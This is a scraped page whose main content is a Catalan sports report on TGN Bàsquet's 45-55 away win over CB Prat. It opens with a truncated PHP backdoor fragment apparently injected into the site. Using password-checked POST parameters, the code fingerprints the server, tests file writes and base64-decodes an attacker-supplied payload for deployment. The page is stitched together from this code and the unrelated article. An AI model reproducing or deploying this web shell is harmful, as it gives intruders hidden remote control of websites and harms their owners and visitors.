function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Victòria Lila, ja en tenim 10! -

Victòria Lila, ja en tenim 10!

Updated: març 31, 2023

Partit corresponent a la jornada 22 on el Sènior A ha visitat la pista del CB Prat, rival directe a la taula classificatòria, i ha pogut sumar un desè triomf a la lliga (45-55). Així doncs, l’equip suma un total de 10 victòries i 12 derrotes i actualment se situa a la mitja taula de Copa Catalunya.

El matx ha començat amb molt de ritme des del primer minut favorable al conjunt Lila. Les tarragonines gràcies als triples de la capitana Laura Pascual i les recuperacions en defensa, han pogut avançar-se a l’electrònic finalitzant els primers deu minuts 9 a 22. En el segon quart el ritme d’anotació ha baixat i s’han imposat les defenses arribant al descans +15 al marcador pel TGN Bàsquet (17-35).

Després del pas pels vestidors, CB Prat ha sortit més intens conscient que a partir de la bona defensa, podia enganxar-se al partit. Tot i això, al final del 3 període s’ha arribat amb un avantatge de 9 punts al marcador favorable al conjunt Lila. Finalment, els últims deu minuts han estat de tràmit (11-11) on l’equip dirigit pel Marc Rovirosa ha sumat el desè triomf a la màxima categoria del bàsquet català.

El proper partit serà d’aquí dues setmanes contra CEJ l’Hospitalet el diumenge 16 d’abril a les 18:30 al Pavelló del Sagrat Cor.

Partit important ja que era un rival directe a la classificació i molt content per tot l’equip ja que avui sí hem plantat cara i competit molt bé – Marc Rovirosa

CB PRAT: 45 – TGN BÀSQUET A: 55

PARCIALS: 9-22, 8-10, 17-12, 11-11